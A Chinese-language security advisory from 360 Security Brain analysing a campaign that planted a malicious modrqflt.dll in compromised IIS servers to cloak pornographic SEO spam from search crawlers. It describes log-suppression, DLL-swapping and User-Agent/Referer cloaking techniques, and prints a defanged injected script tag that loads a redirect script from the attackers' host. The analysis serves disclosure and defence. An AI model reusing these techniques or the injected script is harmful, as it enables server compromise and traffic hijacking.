互聯網信息服務（Internet Information Services）是由微軟公司提供的基于運行Microsoft Windows的互聯網基本服務，大多數Windows系統服務器均有安裝，常用來運行Web服務。而當這一底層架構被惡意黑客盯上，網絡威脅自然隨之而來。

　　近日，360安全大腦獨家發現一新型惡意模塊，被黑客植入其攻陷的IIS WEB服務器，并利用該惡意模塊替換IIS服務中的一個服務組件，躲避檢測查殺。經360安全大腦分析，本次攻擊事件最早開始于2020年8月，黑客攻陷數個知名云服務提供商的數十臺服務器，受影響網站數量高達幾千例，360安全大腦第一時間發出緊急安全預警。

　　攻陷公用云主機服務器，“染毒蜘蛛”過境數千網站

　　360安全大腦分析發現，被攻擊服務器主要為公用云主機服務器，且通常黑客攻陷一個公用云主機服務器后，即可直接獲得幾十甚至上百個網站的控制權，其中不乏企業官網。360安全大腦監測數據顯示，此次遭攻擊服務器高達數十臺，幾千個網站受波及。

（部分受害企業）

　　鑒于上述情況，360安全大腦第一時間對樣本展開分析，隨后發現黑客在攻陷目標服務器后，會從網上下載一個包含db.db、dd.cc、e.cc模塊、x64.dd、x86.dd五個文件的惡意壓縮包，各文件功能具體如下：

　　db.db 是一個SQLite3數據庫文件。主要包含惡意模塊需要的網站模版及關鍵字等信息，此文件后續會被寫入IIS目錄下的inetsrv\modrqflt.dll:db.db文件中，這是一個擁有FILE_ATTRIBUTE_INTEGRITY_STREAM屬性的文件，在目錄下不可見。

　　dd.cc是黑客開發的惡意模塊安裝工具。黑客使用該工具可改變modrqflt.dll的訪問控制權限(DACL)，從而成功將modrqflt.dll重命名為cache.dll，并將惡意程序改名為modrqflt.dll。

　　e.cc模塊是用來停止被攻陷服務器日志記錄的功能。運行之后，其會遍歷線程找到Eventlog服務的線程并停止，以此來停止日志記錄的功能。

　　x64.dd為黑客編寫的64位惡意modrqflt.dll，主要用來替換C:\Windows\System32\inetsrv下iis服務器自帶的modrqflt.dll。

　　x86.dd 則是黑客編寫的32位惡意modrqflt.dll，主要用來替換C:\Windows\SysWOW64\inetsrv下的modrqflt.dll。

（黑客攻陷目標服務器后下載的惡意壓縮包）

　　modrqflt.dll是提供請求過濾處理（Request filtering handler）的功能模塊，而成功替換后，黑客便可以過濾掉網站正常訪問請求，專門為搜索引擎蜘蛛（爬蟲）提供色情素材。

　　完成惡意模塊的替換后，當搜索引擎蜘蛛（爬蟲）訪問網站原本失效鏈接時，此模塊即會生成一個包含大量鏈接的“空白”頁面，并將HTTP響應碼由404改為200來欺騙“蜘蛛”（爬蟲）。而“蜘蛛”在獲取該頁面后，會繼續訪問頁面中的所有鏈接，并抽取關鍵字存入搜索數據庫。此時，如果有用戶搜索對應關鍵詞，就會返回上述偽造鏈接及頁面，如果惡意DLL仍然存在，則會直接跳轉到色情網站。

　　空白頁面神隱“透明”網址，騙過爬蟲蜘蛛猖狂搞顏色

　　404頁面并不少見，通常是由于服務器地址變動，或者維護不到位等因素導致網站個別鏈接失效。正常情況下，當搜索引擎蜘蛛爬取時遇到此類鏈接，也會顯示404頁面，但對于遭遇黑客攻陷的網站來說，其失效鏈接則會騙過“蜘蛛”，顯示空白頁面卻在源碼中暗藏大量鏈接。

　　看到這里你或許會有疑問，中招的網站怎么區分正常的用戶和爬蟲呢？其實當用戶使用瀏覽器打開一個網站，瀏覽器向網站服務器發出請求時，會在請求數據頭部設置一個User-Agent的字段，例如訪問百度時：

　　而當搜索引擎爬取時，User-Agent設置的則有一些不一樣：

　　百度蜘蛛

　　Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html）

　　360蜘蛛：

　　Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider

　　神馬蜘蛛：

　　Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36

　　搜狗蜘蛛：

　　Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)

　　此次事件中，不法黑客下載的惡意模塊會通過判斷User-Agent區分用戶和蜘蛛（爬蟲），當識別為搜索引擎蜘蛛后，就會返回上述100條鏈接，其中前80條hostname是惡意模塊生成的隨機頁面，與當前網站的hostname一致；后20條hostname則是其他受害網站生成的隨機頁面，均為接口hxxp://zjclasjsdknlnxsa.com:8081/ping返回（此接口需要特殊User-Agent才能訪問）。

　　與此同時，100條隨機生成的頁面鏈接，看似雜亂無章其實暗藏一定規律的，它們的URL一般是由下圖中的規則構成，即[]中的為可選。

　　參照上圖的URL規則，觀察隨機鏈接中的path字段會發現，它們全都是以lista/xzs/api/bks開頭，且以上四個關鍵詞，分別對應了四套惡意模塊使用網站模版。

　　在生成網頁過程中，程序還會隨機讀取keyword等其他表中的數據，以此來替換網站模版中的對應留空位置。四套模版運行如下圖所示：

　　上述網頁顯示內容，都是訪問受害網址時數據庫關鍵字替換隨機生成的，搜索引擎蜘蛛（爬蟲）則會將上述偽造的URL和頁面緩存在數據庫中。當用戶在搜索引擎中搜索色情關鍵詞，一旦命中上述偽造頁面內容，那么搜索引擎就會返回上述偽造的URL和頁面摘要。

　　此時，如若用戶點擊頁面網址，瀏覽器則會默認設置Referer字段，以此來標明是從那個鏈接找到當前的鏈接。惡意模塊正是利用這一點，區分當前訪問頁面是否來自于百度/360/搜狗/神馬等國內搜索引擎中的一種。

　　特別是，如果接口hxxp://zjclasjsdknlnxsa.com:8081/jump有返回數據，則會設置頁面的內容為接口返回的數據：

　　如若沒有獲取到接口數據，則會訪問db.db數據庫，將jump中的代碼插入網頁中：

        <script               type="text/javascript" 

        src="hxxp://zjclasjsdknlnxsa.com/js/jump.js"></script>

　　jump.js內容如下：

       上述代碼的主要功能就是跳轉到最終的色情網站：

　　而當我們在某搜索引擎搜索受害網站關鍵詞時，點擊搜索的鏈接，打開的就是色情網址hxxps://2**sg.xyz/，雖然原網址完全是一個正規網站。

（搜索網址為色情網站）

（受害網站原網址為正規網站）

　　黑灰產業鏈持續發酵，360安全大腦強勢出擊

　　經360安全大腦研判分析，此次是黑灰產業鏈的持續性攻擊事件，黑客團伙使用專業的滲透技術對各類網站進行攻擊并植入木馬，非法獲取服務器控制權，并在隨意管控攻陷的肉雞服務器的基礎上，利用搜索引流擴散色情詐騙內容，影響正規網站正常業務運行。

　　現階段，黑客團伙攻擊仍在持續，廣大用戶應格外警惕，避免遭受不必要的損失。對此，360安全大腦給出如下安全建議：

　　1、盡快前往weishi.360.cn，下載安裝360安全衛士，有效攔截各類病毒木馬攻擊，保護電腦隱私及財產安全；

　　2、注重服務器安全管理，規范安全等級保護工作，及時更新漏洞補丁；

　　3、建立網站安全策略，防止攻擊發生時危害進一步擴大。